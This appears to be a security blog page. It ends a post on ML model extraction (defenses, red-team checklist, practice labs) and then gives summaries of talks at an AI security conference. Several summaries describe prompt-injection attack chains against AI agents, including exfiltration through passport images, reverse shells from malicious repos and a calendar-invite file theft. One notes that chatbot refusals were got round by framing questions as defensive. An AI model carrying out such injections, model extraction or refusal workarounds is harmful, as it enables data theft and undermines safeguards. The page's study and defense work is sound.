  • Query distribution concentrated near decision boundaries

  • Absence of normal user behavior patterns (no typos, unusual formality, systematic coverage)

  • Large volume of low-confidence queries (boundary exploration)

Defensive controls (with honest effectiveness ratings):

Rate limiting: Necessary, insufficient. Attackers distribute queries across IPs, use multiple accounts, or simply slow their exfiltration rate. Raises cost, doesn't prevent.

Output restriction: Returning only the predicted class rather than full probability distributions significantly raises the query cost of extraction: each query yields less information, requiring more queries to train an equivalent substitute. One of the most cost-effective defenses.

Query anomaly detection: Statistical analysis of query patterns to identify systematic exploration. Requires investment in monitoring infrastructure but provides early detection of extraction campaigns.

Model output watermarking: Embedding statistical watermarks in outputs that persist in any extracted substitute. This enables attribution; if you find a model that responds with your watermark, it was extracted from yours. Active research area with promising results.

Build pipeline hygiene (the lesson from today):

npm pack --dry-run

echo "*.map" >> .npmignore

bun build --sourcemap=none src/index.ts --outdir dist/

Red Team Assessment Checklist

When assessing an organization's AI IP protection posture:

Build pipeline and distribution:

  • Are source maps excluded from all published packages?

  • Are model weights and artifacts stored with appropriate access controls?

  • Is there access logging on model weight storage?

  • Are CI/CD secrets (training credentials, API keys) rotated regularly?

API security:

  • Does the API return full probability distributions, or only predicted classes?

  • Are there rate limits per API key, IP, and user account?

  • Is there anomaly detection on query patterns?

  • Are model outputs watermarked for attribution?

Insider threat:

  • Are model weights in access-controlled repositories with audit logs?

  • Is there offboarding procedure for researchers with model access?

  • Are access permissions reviewed on regular cadence?

Supply chain:

  • Are npm dependencies pinned to specific versions with hash verification?

  • Is there automated scanning for malicious dependency additions?

  • Are lockfiles committed and verified in CI/CD?

Where to Practice — Labs and CTF Resources

Understanding this TTP on paper is one thing. The only way to actually build intuition for what extraction looks like in practice, the query patterns, the fidelity numbers, the boundary exploration behavior is to run it yourself. Below is a curated map of every platform that has hands-on labs for model extraction and related ML attack techniques, ordered by how directly they cover this TTP.

Dreadnode Crucible: Best Direct Coverage

Crucible is the closest thing to a dedicated AI red teaming dojo, and it has a specific model extraction category. The platform is free, browser-based, and the challenges run against live API endpoints rather than contrived sandboxes.

The Bear Series is the recommended entry point for this TTP specifically. Bear3 covers model extraction — querying a black-box API, analyzing the outputs, and inferring the model's internal structure without direct access. Bear4 covers model fingerprinting — identifying and characterizing a deployed model based purely on its output behavior, building a fingerprint that distinguishes one model from another. Both challenges come with Jupyter notebook walkthroughs.

The full challenge catalog also includes model evasion, adversarial image and audio manipulation, membership inference, data poisoning, and system prompt leakage: a complete adversarial ML curriculum against live targets.

Dreadnode was founded by Will Pearce and Nick Landers, who are legitimate names in offensive AI security. Their AIRTBench research (which benchmarks AI models against Crucible challenges) demonstrates Claude 3.7 Sonnet solving 61% of the challenge suite: useful context on the difficulty ceiling.

Microsoft AI Red Teaming Playground Labs + PyRIT

Originally taught at Black Hat USA 2024, these labs are tied to Microsoft's open-source PyRIT framework (Python Risk Identification Tool for Generative AI). Released as a public GitHub repo, referenced in the Microsoft Learn AI Red Teaming 101 series (10 episodes, free, July 2025).

The honest assessment on coverage: the playground labs themselves focus on prompt injection (single-turn and multi-turn), indirect injection via a mock webpage, automating attacks with PyRIT, and implementing mitigations. There is no dedicated model extraction challenge in the lab set.

What is relevant here is PyRIT itself. The framework explicitly supports simulating model extraction attacks to assess how easily a model's functionality can be duplicated. You can point PyRIT at your own model endpoint or local Ollama deployment and run systematic extraction queries with built-in logging and scoring. It also supports model inversion and membership inference attack simulation.

The MathPromptConverter (one of 61 built-in converters) transforms user queries into symbolic math problems — directly applicable to the token smuggling and obfuscation techniques that make extraction queries less detectable by input-side guards.

AI Village CTF @ DEFCON: Archived, Solvable

The AI Village CTF is the longest-running adversarial ML competition series, run annually at DEFCON via Kaggle. The challenge taxonomy explicitly includes a "Steal" category: interacting with the model API to learn about its structure and find a way to recreate it. In traditional hacking you might exfiltrate a model binary, but in these challenges you interact with the API, exactly the black-box extraction methodology covered in this blog post.

Both the DEFCON 30 and DEFCON 31 competitions are archived on Kaggle and remain solvable as self-paced challenges. Community writeups exist for most challenges.

SaTML 2024 LLM CTF (ctf.spylab.ai)

Run as part of the SaTML 2024 conference. The focus was on system prompt extraction and whether prompting/filtering mechanisms can make LLMs robust to injection and extraction attacks. The full dataset: 72 defenses and 144,838 adversarial chat logs is now public, making it a research-grade resource for understanding what extraction attempts actually look like at volume.

More relevant to the system prompt exfiltration angle than model weight extraction, but the extraction methodology overlaps directly with what's covered in this post.

HackThisAI (GitHub): Self-Hosted

The original adversarial ML CTF challenge set that shaped the DEFCON competitions. No longer maintained but still functional. Categories include Steal (model extraction), Evade (adversarial examples), Influence (data poisoning), and Membership Inference. Each challenge is a self-contained Jupyter notebook — no platform registration required, runs locally.

Good for offline lab work on Kali or an air-gapped machine. Lower production quality than Crucible but fully self-contained.

Recommended learning path: Start with Dreadnode Crucible Bear3/4 for the dedicated extraction walkthrough. Use the AI Village DEFCON archives for additional challenge variety and community writeups. Integrate PyRIT for automation once you understand the manual methodology — being able to run systematic extraction queries programmatically and log/score results is the operational skill that translates to real engagements.

Conclusion

Model extraction is the IP theft attack of the AI era. It doesn't always require sophisticated adversarial techniques. Sometimes it's a .map file in an npm package. Sometimes it's an authorized researcher with a public internet connection. Sometimes it's a well-resourced competitor who's willing to spend a few thousand dollars on API calls.

The Claude Code incident is instructive beyond the technical details: a company building AI security tooling, with dedicated internal systems to prevent information leakage, exposed its entire proprietary codebase through a build configuration oversight. For the third time.

Security is hard. Build pipelines are harder. But npm pack --dry-run is free.

The asymmetry of AI IP theft is real — training a frontier model costs hundreds of millions of dollars. Extracting a functional approximation of its behavior costs API credits. Accidentally exposing the source costs nothing at all.

As organizations invest further in proprietary AI assets, protecting those assets — through API design, build pipeline hygiene, access controls, anomaly detection, and watermarking — is not optional. It's as critical as protecting your production database.

References

Tramèr, F., Zhang, F., Juels, A., Reiter, M. K., & Ristenpart, T. (2016). Stealing Machine Learning Models via Prediction APIs. 25th USENIX Security Symposium (USENIX Security 16), pp. 601–618. Austin, TX. https://www.usenix.org/conference/usenixsecurity16/technical-sessions/presentation/tramer

Carlini, N., Paleka, D., Dvijotham, K., Steinke, T., Hayase, J., Cooper, A. F., Lee, K., Jagielski, M., Nasr, M., Conmy, A., Yona, I., Wallace, E., Rolnick, D., & Tramèr, F. (2024). Stealing Part of a Production Language Model. ICML 2024 (Best Paper). arXiv:2403.06634. https://arxiv.org/abs/2403.06634

Haselton, T. (2026, March 31). Claude Code's source code appears to have leaked: here's what we know. VentureBeat. https://venturebeat.com/technology/claude-codes-source-code-appears-to-have-leaked-heres-what-we-know

Shou, C. [@Fried_rice]. (2026, March 31). Claude code source code has been leaked via a map file in their npm registry! [Post]. X .

Anhaia, G. (2026, March 31). Claude Code's Entire Source Code Was Just Leaked via npm Source Maps — Here's What's Inside. DEV Community. https://dev.to/gabrielanhaia/claude-codes-entire-source-code-was-just-leaked-via-npm-source-maps-heres-whats-inside-cjo

OWASP Foundation. (2023). OWASP Top 10 for Machine Learning Security: ML05 — Model Theft. OWASP Gen AI Security Project. https://genai.owasp.org/llmrisk2023-24/llm10-model-theft/


Anthropic. (2026). Claude Sonnet 4.6 [Large language model]. https://claude.ai

Used for: research synthesis, code examples, and reference compilation throughout this post.

Read More
August van sickle August van sickle

[un]prompted 2026 Talks Summary

[un]promoted 2026 — Talk Summaries

03 · Heather Adkins & Four Flynn — Evaluating Threats & Automating Defense at Google

Google's ambition to eliminate every software vulnerability on Earth using AI. They've built two systems: Big Sleep (agentic vulnerability discovery that finds deep bugs classical fuzzing misses — already has ~178 fixes) and Code Mender (automated patching pipeline). The workflow: LLM reasons about the codebase, generates exploit PoCs, runs them, gets feedback, iterates, then produces a verified patch with a high-quality report for the developer. Key challenge is verification — they use formal methods, fuzzing pre/post-patch, and functionality checks. NVD has a 30K backlog; this is aimed at closing that gap autonomously without human intervention in the loop.

04 · Joshua Saxe — The Hard Part Isn't Building the Agent: Measuring Effectiveness

The real blocker for autonomous AI security systems isn't building them — it's evaluating them. Classic ML metrics (precision/recall/F1) break down for agentic tasks because ground truth in security is inherently noisy (human experts disagree at double-digit rates on whether alerts are real). Proposes a rubric-based holistic evaluation approach modeled on hiring interviews: grade agents on whether they gathered the right evidence, reasoned correctly, made the right decision, and explained it clearly. Argues that without rigorous evals, you can't safely deploy autonomous cyber defense — you're just flying on vibes. Also covers how to use LLM-as-judge with calibration against domain experts.

05 · Shruti Datta Gupta & Chandrani Mukherjee — Security Guidance as a Service (Adobe)

Adobe's two-person team built a RAG-based system to democratize security guidance across their entire engineering org. Developers get consistent, vetted, org-specific security answers whether they're in Slack, Jira, or their IDE (Cursor via MCP server). The pipeline: document ingestion → embeddings → vector store → LLM orchestrator → formatted response. Key lessons: document freshness is critical (they run evals and diff-checks on source docs), eval pipelines are non-negotiable, and making security "zero calorie" for developers drives adoption. Also integrated with Jira for automated vulnerability remediation guidance.

06 · Jeffrey Zhang & Siddh Shah — Guardrails Beyond Vibes (Stripe)

Built two AI security agents at Stripe: a threat modeling agent and a security routing agent. Core problem: LLM outputs are non-deterministic, so you can't just vibe-check quality. They built a semantic equivalence eval pipeline (using AlphaEvolve/LLM-as-judge) to measure accuracy across prompt changes. Key learnings: garbage prompt → garbage output; agent architecture matters (modular multi-agent beat single monolithic); JSON formatting issues killed 10% accuracy; threat modeling is art not science so there's no single "right" answer. Required humans in the loop for final approval. Phased rollout + shadow mode before full production release.

07 · Paul McMillan & Ryan Lopopolo — Code Is Free: Securing Software (OpenAI)

Practical philosophy: code is now free, so stop treating security as a bottleneck. Encode all your security expertise, past PR feedback, and tribal knowledge into your codebase as security.md, agents.md, and inline threat models — then have coding agents (Codex) enforce them on every PR autonomously. Use agents to run dependency reputation checks, supply chain analysis, and guardrail validation in CI. The key insight: your job as a security engineer shifts from writing policies to distilling your expertise into prompts and codebase artifacts that agents can act on at scale. Also covered: package manager hardening, post-install script blocking, and telemetry for tracking agent behavior.

08 · Brendan Dolan-Gavitt & Vincent Olesen — Agents Exploiting "Auth-by-One" Errors

Novel approach to automated authorization/IDOR bug finding using AI agents. The core trick: give an agent two auth contexts (low-privilege user + admin), have it probe endpoints, and look for differential responses. That differential is your oracle — if the low-priv request gets back what only admin should see, you found a bug. They also handle authentication bypasses (JWT forging from hardcoded keys, parameter manipulation like admin=1), MFA bypasses, and session issues. Built a validator system to confirm exploitation succeeded. Demo'd on Redmine with a real IDOR. Key insight: you don't need to teach the agent auth from scratch — the differential response IS the signal.

09 · Natalie Isak & Waris Gill — Developing & Deploying AI Fingerprints (Microsoft)

BinaryShield — a cross-service prompt injection correlation system for large orgs with multiple AI products. Problem: each service has its own safety stack and can't share raw prompts across service boundaries due to privacy. Solution: 4-step pipeline — strip PII → generate embedding → quantize to binary (0/1) via hamming distance → add differential privacy noise → publish fingerprint to shared registry. When Service Alpha catches an attack, it broadcasts the binary fingerprint; Services Beta/Gamma can match against it without ever seeing the actual prompt. Trade-off: privacy budget (epsilon) controls noise level — more privacy = less correlation accuracy. Demonstrated 36x speed improvement over dense embedding search.

10 · Sean Park — When Passports Execute: Exploiting AI-Driven KYC Pipelines

Live demo of indirect prompt injection via passport/ID document images in KYC pipelines. Attacker embeds malicious instructions in document fields (passport text, authority fields). The AI extraction agent reads the document, follows the injected instructions, and exfiltrates data from the connected SQLite database or writes malicious records. Key challenge: building semantically diverse injection prompts — a single prompt that works one day may not work the next, so used Claude to generate 200 varied prompts tested against 13 models. Recommended defenses: read-only DB access, encrypt column names, validate at the data layer not the prompt layer. Also discussed using sub-agents to keep context windows small and improve reliability.

11 · Peter Girnus & Derek Chen — FENRIR: AI Hunting for AI Zero-Days at Scale (Trend Micro)

Production-scale zero-day discovery engine targeting AI/ML frameworks (LangChain, etc.). Cascade architecture: YARA/semgrep → CQL → LLM L1 triage (fast, biased toward recall) → LLM L2 deep agentic analysis (Opus, multi-turn, full sandbox with code execution) → human review. Key results: 60+ CVEs filed, ~$0.61 median cost per true positive, 2.5x throughput increase, 70% faster disclosure timelines vs. traditional research. Dynamic token allocation across stages. The L1 triage must never drop true positives; false positives are fine at that stage. Reflection prompting keeps models honest. Demo showed a live scan with a real finding during the talk.

12 · Joe Sullivan — AI Notetakers: The Most Important Person in the Room

Former Uber/Meta CISO sounding the alarm on AI meeting recorders (Otter, Granola, etc.) becoming a massive, underappreciated security risk. Key issues: attorney-client privilege destruction (judge ruled "your conversations with Claude are not privileged"), trade secret exposure, recording consent laws, prompt injection via meeting content, data retention unknowns, and the fact that the AI notetaker now has full context on every sensitive conversation in your company. Real-world example: a CISO got fired after an employee secretly recorded him. The notetaker is now "the most important person in the room" because it shapes what gets remembered and surfaced. Call to action: security teams need policies NOW before wearables (Meta glasses, etc.) make this even harder.

13 · Adam Laurie (Major Malfunction) — AI go Beep Boop

Hardware hacking demo of using Claude to democratize voltage glitching for firmware extraction. The Raiden Pico project: a ~$7 Raspberry Pi Pico as a disposable glitching platform replacing $1,000+ FPGA rigs. Demo'd extracting firmware from a readout-protected chip using electromagnetic fault injection. Claude's role: answered the three key glitch parameters (where, when, how hard), wrote the ADC measurement code, helped reverse engineer the timing, and ported code across platforms. Key message: AI has made hardware hacking accessible to hobbyists and lowered the barrier from nation-state-level capability to anyone with $7 and curiosity. The Raiden Pico is open-source.

14 · Rami McCarthy — Zeal of the Convert: Taming Shai-Hulud with AI

Practical threat intelligence tradecraft using AI for large-scale supply chain attack attribution. Case study: the Singularity/SHY-HULUD npm supply chain attack affecting 30K victims and 37 of the Fortune 100. Key workflow: collect → analyze with AI (identify data shape, extract signals) → build deterministic rules → feed back loop. Critical lessons: don't replace deterministic methods with AI — use AI to generate better deterministic rules; flat files + AI beat feeding 30GB to context windows; reasoning models excel at pattern recognition and attribution from encoded data (JWTs, environment variables); inject skepticism to prevent AI from hallcinating confident-sounding wrong answers; build composable throwaway tools rather than reinventing pipelines. The "RPI loop": iterative AI-assisted analysis cycles until exit criteria.

15 · Daniel Miessler — Anatomy of an Agentic Personal AI Infrastructure

Demo of Daniel's personal AI stack built on Claude Code + custom skills/agents. Key components: Council (two debate agents argue a position, main agent synthesizes), Iterative Depth (scientific method loop for research questions), PI Upgrade (monitors package releases, auto-drafts upgrade PRs), Label & Rate (surfaces highest-signal content from all sources), and Surface (OSINT recon pipeline — subdomains → ports → fingerprinting). Central thesis: the future is everyone having a personal AI infrastructure that filters reality for them, amplifies their capabilities, and handles recurrent tasks. Companies will become APIs. Security implications: if your AI system is compromised, everything it touches is compromised. Argues for discrete, testable, SOP-driven agent design over monolithic agents.

16 · Nicholas Carlini — Black-Hat LLMs (Anthropic)

The most technically sobering talk of the conference. Carlini (vulnerability researcher at Anthropic) presented evidence that LLMs are now finding real, novel, exploitable vulnerabilities in production software — Linux kernel heap overflows, NFS protocol implementation bugs, smart contract exploits, SQL injection in CMS platforms. Key data: models can complete tasks that take humans ~15 hours; capability is doubling every ~4 months on security benchmarks; the most recent models can find bugs that older models couldn't. Live demo: Claude Code autonomously finding and exploiting a Ghost CMS blind SQL injection with no scaffolding. The concern isn't malicious use (safeguards exist) — it's the transitionary period where attackers adopt faster than defenders can patch. Call to action: the security community needs to help Anthropic find and fix bugs FASTER, because the window is closing.

17 · Piotr Ryciak — Vibe Check: Security Failures in AI-Assisted IDEs (Mindgard)

Systematic security research across 40+ AI-assisted IDEs (Cursor, Claude Code, Gemini CLI, Amazon Kiro, Codeex, etc.), finding 37 vulnerabilities across 9 categories. The four attack primitives: prompt injection (hidden instructions in repo files), file read (agents indexed and exfiltrated secrets), config poisoning (malicious MCP configs in workspace), URL fetching (external callbacks). Attack chains: victim clones malicious repo → opens in IDE → agent reads adversarial directory name or index.md → follows attacker instructions → reverse shell / secret exfiltration. Key finding: workspace trust models are universally broken — approval fatigue, race conditions (code executes before trust dialog shows), trust not re-prompted on config changes. Proposed baseline: deny trust by default, reprompt on config changes, hash-based integrity checks. MCP servers run outside sandbox = persistent attack surface.

18 · Gadi Evron — Closing Words

Conference organizer closing remarks. Noted ~800 attendees, praised Salesforce as the sponsor, thanked speakers and volunteers. Community-building theme: security + AI practitioners forming a cohesive community. Happy hour announced.

19 · Billy Norwood — Establishing AI Governance Without Stifling Innovation (FFF Enterprises)

CISO of a $5B pharmaceutical distribution company sharing how they built AI governance from scratch. Key structure: AI Center of Excellence committee (CISO, CIO, legal, compliance, data science), risk-tiered intake form (low/medium/high based on PHI, PII, financial data exposure), Databricks as central AI platform and "system of context" (not system of record). Use cases: medical pre-auth automation ($250K saved), pharmacy compliance workflows, SAP/Salesforce data integration via orchestrator agents. Lessons: governance needs executive sponsorship early; shadow AI will happen anyway so build secure on-ramps; acceptable use policy + training reduces risk more than blocking; secure browsers help corral shadow AI; human-in-loop requirements scale with risk level.

20 · Ragini Ramalingam — Enterprise AI Governance at Snowflake

Head of enterprise security at Snowflake on governing AI at an AI-first engineering company where the CEO wants everything yesterday. Core framework: visibility first (you can't govern what you can't see — deployed endpoint/network/DLP/CASB to discover all AI tools), then feature-based risk assessment (not tool-based), then dynamic control planes that evolve as fast as vendor feature releases. Key shift: traditional governance assumed deterministic execution (defined logic → predictable output); AI agents are non-deterministic (one prompt can trigger arbitrary system calls, file reads, network egress). Solution: constrain execution authority at the agent level, not just access level. Cross-functional steering committee with real executive authority is essential. Weekly syncs with vendors to stay ahead of feature releases. Governance must move at the speed of AI or it becomes irrelevant.

21 · Chase Hasbrouck — Three Phases of AI Adoption (US Army Cyber Command)

LTC from Army Cyber Command sharing the DoD/Army AI adoption arc. Phase 1: Shadow AI era — soldiers using ChatGPT on personal devices, building CamoGPT (Army's internal GPT wrapper), Llama 2 on-prem experiments (largely failed — models too weak). Phase 2: Enterprise platforms — JAI.mil (DoD-wide AI platform), enterprise agreements, Copilot rollout, but token scarcity and bureaucratic procurement cycles created bottlenecks (burned monthly tokens by day 1). Phase 3: Now — agentic workflows, MCP integrations, specialized models for specific domains (malware analysis, SIGINT). The "silo reflex" problem: every unit wants their own specialized box instead of contributing to a shared platform. Key challenge: classification requirements effectively prohibit the most valuable use cases at the SECRET+ level. Bottom line: same adoption battles as every enterprise, just with extra paperwork and lives on the line.

Hell of a conference. The through-lines across all talks: eval rigor is the unsolved problem, MCP/agentic attack surface is exploding, governance needs to move at the speed of AI, and Carlini's talk is the one that should keep everyone up at night.

[un]promoted 2026 — Batch 2 Talk Summaries

32 · Gadi Evron — Opening Words (Day 2)

Conference organizer opening for Day 2. ~700 attendees online, ~550 in-person. Key themes: the shift to nondeterministic systems (coding agents, MCP) is creating auditability and traceability problems that security hasn't caught up to yet. "Citizen coders" bypassing SSO, vibe-coding their way into production — CISO, finance, devs, HR all now have AI agents. Gadi's provocation: if you haven't looked at the AI changelog in your enterprise every week, you're already behind. The conference is forming into a community, which is the real value.

22 · Rob T. Lee — SIFT-FIND-EVIL: I Gave Claude Code R00t on the DFIR SIFT Workstation

SANS founder demo: gave Claude Code root access on the SIFT DFIR workstation with a claude.md orchestrator file that knows all the SIFT tools. Result: a complete intrusion analysis of a compromised Windows image (C drive + memory) in 18 minutes, producing a full professional report with executive summary, timeline, IOCs, and malware inventory. Normally takes 2-3 days of manual analysis. Key workflow: cloud.md defines tools → agent runs volatility, Plaso, event log analyzers, network forensics tools autonomously → compiles report. Announced a SIFT hackathon/competition with $10K+ prize pool. Main limitation discussed: context rot on large disk images — need to manage context windows carefully with sub-agents or chunking.

23 · Mika Ayenson — "Can You See What Your AI Saw?" (Elastic)

Detection engineering perspective on the AI IDE/agent observability gap. Current telemetry sees processes spawning (cursor, claude, node, bash) but not why — no visibility into the prompts, tool calls, or reasoning. Gaps: you see the git commit but not that it was AI-generated; you see the subprocess but not the prompt that triggered it; you miss grandchildren processes below the parent. Proposed detection signals: unusual ancestry trees from AI processes, config file modification (.cursor/, claude.md, MCP configs), credential file access, unexpected network calls from IDE processes, agent hook telemetry (pre/post tool call events). The industry needs full chain observability: prompt → tool call → output → file system effect. Shared Elastic detection rules. MCP server spawning outside sandbox is a specific detection opportunity.

24 · Mohamed Nabeel — Detecting GenAI Threats at Scale with YARA-Like Semantic Rules (Palo Alto)

Introduced SuperYara — an open-source framework that extends YARA with semantic/LLM-based conditions for detecting GenAI threats (prompt injections, malicious AI-generated content, clickfix attacks, etc.). Architecture: standard YARA atoms as a cheap pre-filter → if matched, call LLM condition for semantic judgment → classifier layer. Key design: cascade filtering (cheapest rule first, only invoke expensive LLM if pre-filter passes) achieves ~99% cost reduction vs. pure LLM analysis. The library is pluggable — swap any LLM backend. Demo'd detecting a clickfix attack where JavaScript deobfuscation required semantic understanding that classic YARA couldn't handle. Achieves 4.5 second average detection time. Fully open source on GitHub (pip install superyara).

25 · Aaron Grattafiori & Skyler Bingham — Tenderizing the Target (NVIDIA)

End-to-end AI-powered offensive security pipeline for automated vulnerability discovery and exploitation in production codebases. Workflow: ingest target codebase → architecture analysis → CWE-based vulnerability triage → proof-of-concept generation → build/test loop → verified exploit. The "tenderizing" metaphor: systematically softening defenses by understanding the target deeply before injecting. Key components: skills system (reusable attack modules), sub-agent parallelism (multiple vulnerability classes tested simultaneously), anti-reward hacking measures (avoid gaming evals), and build harnesses that confirm actual code execution. Current limitations: still weak at business logic vulns; models sometimes refuse PoC generation; needs latest frontier models. Not open source but described the architecture for building similar systems. Practical note: inject CWE context into prompts rather than free-form "find vulns" for better signal.

26 · Matt Maisel — Hooking Coding Agents with the Cedar Policy Language (Cindera)

Using Cedar (AWS's open-source policy language) as a deterministic guardrail layer for coding agents. Problem: can't rely solely on LLM safeguards — need an always-invoked, tamperproof, auditable enforcement layer. Architecture: hook every agent action (plan, generate, execute, tool call) as events → Cedar policy engine evaluates attributes (user identity, file path, operation type, environment context) → allow/deny. Enables information flow control (taint tracking: mark a secret as confidential, prevent it from being written to a log), trajectory-aware policies (block dangerous actions only after certain prior actions occurred), and multi-turn stateful guardrails. Cedar is expressive, fast, and formally analyzable — policies can be machine-checked for correctness. Demo'd blocking environment variable harvesting and destructive SQL queries without WHERE clause. Open sourced example policies. Complements sandbox systems, not replaces them.

27 · Carl Hurd — Glass-Box Security: Operationalizing Mechanistic Interpretability

Applying mechanistic interpretability (reading model internals via activations) as a new class of security detection. Instead of looking at inputs/outputs, look at what's activated inside the model during inference. Key concept: capture latent space activations at specific layers to detect malicious intent before it manifests in output — e.g., detect "file deletion intent" or "credential exfiltration intent" as a high-confidence activation pattern regardless of how the prompt is phrased. Uses cosine similarity against known-bad activation manifolds. Challenges: activations aren't available in closed-source APIs (cloud models); dimensionality is enormous; requires per-model calibration; can't be universal. For open-source/fine-tuned models this is tractable today. Analogous to building YARA rules but for neural activation patterns. Called for building a community of "glass-box security" researchers analogous to malware analysts.

28 · Maxim Kovalsky — The AI Security Larsen Effect: How to Stop the Feedback Loop

The "Larsen effect" (audio feedback loop) analogy for AI security vendor evaluation spiraling into noise. Problem: customers arrive with "we need AI security," get pitched 40 overlapping vendors, buy multiple tools with redundant capabilities, then need more tools to manage the first tools. Built AdjusterIQ — a tool to help security architects map business requirements to vendor capabilities systematically. Workflow: define use cases → map to risk taxonomy (Palo Alto/MITRE-inspired) → evaluate vendors against capability matrix → identify gaps → recommend buy/build/partner decisions. Demo'd using Claude Code to scrape vendor API docs and capability claims, score them, surface gaps. The tool flags when vendors claim capabilities they can't actually deliver. Main takeaway: start with use cases, not vendor lists — let requirements drive tool selection, not marketing slicks. Open sourced on GitHub.

30 · Aaron Brown & Madhur Prashant — Trajectory-Aware Post-Training Security Agents

Technical deep-dive on RL-based post-training of LLMs for security tasks (pen testing, CTF, code analysis). Problem: base models are decent at atomic tasks but fail at long-horizon security workflows because they lack security-specific behavioral training. Solution: define a verifiable reward (did you get the flag? did the exploit succeed?), set up a live environment (containers with vulnerable apps), run the agent, collect trajectories, optimize via GRPO/REINFORCE. Key challenges: reward hacking (model games the metric without solving the actual task), compute cost (multi-turn long-horizon RL is expensive), and generalization (trained on CTFs, may not transfer to real-world apps). Used Qwen 3 as base model; after training on CyBench, went from ~0% to solving multiple previously-unsolvable challenges. Framework: Open Trajectory (open source, collects agent traces in common format). Tools mentioned: SkyRL, Unsloth, VerlX. Key lesson: eval design is 80% of the work.

31 · Adam Krivka & Ondrej Vlcek — AI Found 12 Zero-Days in OpenSSL

Isle (AI Security Lab Engine) — their production vulnerability research pipeline found 12 CVEs in OpenSSL including stack overflows, memory corruption, and logic bugs in TLS components. Architecture: two-phase — broad exploration (generate as many hypotheses as possible) followed by deep narrowing (verify and prove exploitability). The pipeline: static analysis → context construction → LLM triage → agentic deep analysis with code execution sandbox → human review for final CVE submission. Key insight: LLMs excel at historical pattern matching — they've seen similar bug classes across millions of codebars and can hypothesize likely vulnerable code patterns. False positive rate is kept low by requiring the model to self-dispute findings before human review. Also working on automated remediation. The OpenSSL team (Matt Caswell) was initially skeptical; now collaborating. Being applied to other high-prominence open source projects. CVE hub available at isle.ai.

33 · Rob Lee, Glenn Thrope, Dan Hubbard, Sergej Epp — Vibe Coded (Panel/Demo)

Closing panel + demo session. Rob demo'd a conference agenda app vibe-coded in 8 minutes using Lovable to make the point about how fast useful tools can be built. Panel discussion covered: the democratization of exploit building (if finding CVEs is getting as cheap as commodity research, what changes?); how DFIR timelines are collapsing from weeks to hours; the need to meet offensive AI speed with defensive AI speed. Hubbard noted exploit-to-patch timelines are already shrinking. Key call to action: the fundamental economics of security are changing — the question isn't whether to use AI, it's whether you're building the muscle to verify, validate, and integrate it responsibly. Audience poll: ~3% had already vibe-coded a security tool at the conference.

38 · Gadi Evron on behalf of Zenity — PleaseFix

Impromptu PowerPoint karaoke — Gadi presented Zenity's research slides without having seen them before, with Zenity's team correcting him in real time. The research covered agentic browser attacks — specifically a zero-click attack chain where: (1) attacker sends a calendar invite with embedded prompt injection instructions, (2) an AI agent (Comet) accepts the meeting autonomously, (3) the agent navigates to an attacker-controlled site, (4) receives more malicious instructions, (5) exfiltrates files from the filesystem. Also demonstrated 1Password autocomplete abuse: the agent sees a password field, triggers autocomplete, harvests the credential. Key point: agentic browsers run under the user's identity — they can accept meetings, read files, and make decisions without confirmation. The attack is "intent collision" — user intent vs. attacker intent injected via external content.

39 · Dan Guido — 200 Bugs/Week Engineer: How We Rebuilt Trail of Bits Around AI

Trail of Bits CEO on rebuilding a 100-person elite security consultancy around AI. Key framework: four maturity levels — AI-Assisted (autocomplete), AI-Augmented (agent helps, human drives), AI-Automated (agent drives, human reviews), AI-Native (agents have full autonomy within defined scope). Most companies are stuck at Assisted. ToB built: a curated skills/plugin marketplace (open-sourced), a claude.md standard, an AI handbook, dead-simple defaults, a dev sandbox, and a maturity matrix to assess where clients are. Results: senior consultants running 200+ bugs/week through automated analysis vs. ~10 manually. Key psychological barriers to adoption: self-enhancement bias (people overestimate their own skill vs. AI), loss aversion (fear of being replaced), status quo bias, and perceived autonomy loss. Hackathons as forcing functions for adoption. Open questions: how do you check AI judgment quality? how do you avoid capability substitution vs. enhancement? skills repo link shared.

40 · Sergej Epp — 8 Minutes to Admin: We Caught It in the Wild (Cydig)

Real-world AI-assisted cloud attack case study — caught an attacker achieving admin access to an AWS environment in 8 minutes from initial credential compromise. Attack chain: credential leak from GitHub → S3 bucket enumeration → IAM privilege escalation → Lambda function abuse → admin. AI accelerated every step: faster recon, automated enumeration, rapid IAM policy analysis. Key defensive insight: honey tokens favor defenders — AI attackers are loud (high API call volume, burst activity, unusual timing patterns), and honey tokens/canary identities trigger immediately on AI-driven enumeration. Proposed four controls: (1) honey tokens everywhere in the environment; (2) time-based controls (burst activity rate limiting); (3) accent detection (AI agents have characteristic API call patterns from training data); (4) confessing locks (write-once audit trails attackers can't erase). The "accent" concept is novel — AI agents trained on certain data tend to generate API calls with identifiable patterns (naming conventions, parameter ordering, etc.) that can fingerprint AI vs. human attackers.

41 · Olivia Gallucci — macOS Vulnerability Research (Datadog)

Hybrid AI + deterministic tooling workflow for macOS kernel/driver vulnerability research. The approach: use Apple's open-source releases as reference → diff versions to find changed trust boundaries (new XPC entry points, IOKit external method changes, IPC contract changes) → AI generates hypotheses about vulnerable code paths → deterministic fuzzer (with AI-guided seed corpus) validates → agent correlates crash logs back to source. Key tools: class-dump, strings, otool, AI for semantic analysis of opaque binaries. The AI is used as a map, not a god — it helps orient research, suggests what to fuzz next, and correlates callers to callees across the codebase. Doesn't fully trust AI outputs; uses it to accelerate the hypothesis-generation phase before human verification. Noted that AI chatbots often refuse to explain macOS attack mechanics — she worked around this by framing queries as defensive/detection research. The workflow is modular (GPLV3 open source), designed to run continuously on every Apple release.

Batch 2 through-lines: The offensive acceleration is now undeniable (8 min to admin, 12 OpenSSL zero-days, 200 bugs/week). Detection is falling behind the tool sprawl. Post-training for security tasks is becoming accessible. And the community is gelling around the idea that the skills gap can only be closed by embedding AI deeply into both offensive and defensive workflows — not treating it as a separate category.

[un]promoted 2026 — Final Batch Summaries

55 · Niki Aimable-Niyikiza — Capability-Based Authorization for AI Agents

The best existing authorization model (RBAC/ABAC) doesn't translate cleanly to multi-agent systems where agents spawn sub-agents, delegate tasks, and chain tool calls. The fix: capability-based authorization using cryptographic warrants (inspired by Google's macaroons and SPIFFE/SPIRE workload identity). A warrant is a signed artifact minted at task-dispatch time that specifies exactly what the agent can do, to what scope, with a short TTL. When sub-agents are spawned, they receive an attenuated warrant — same or narrower permissions, never broader. The enforcement point lives at the execution layer (before actual API/tool calls), so even a compromised orchestrator can't escalate privileges beyond the warrant's constraints. Key properties: ephemeral, cryptographically verifiable, prevents confused deputy attacks, constrains blast radius to frozen at dispatch time. Built at a company called "Botonic" with LangGraph integration. Calling for community benchmarks for multi-agent authorization.

56 · Xenia Mountrouidou — Traditional ML vs LLMs: Who Can Classify Better?

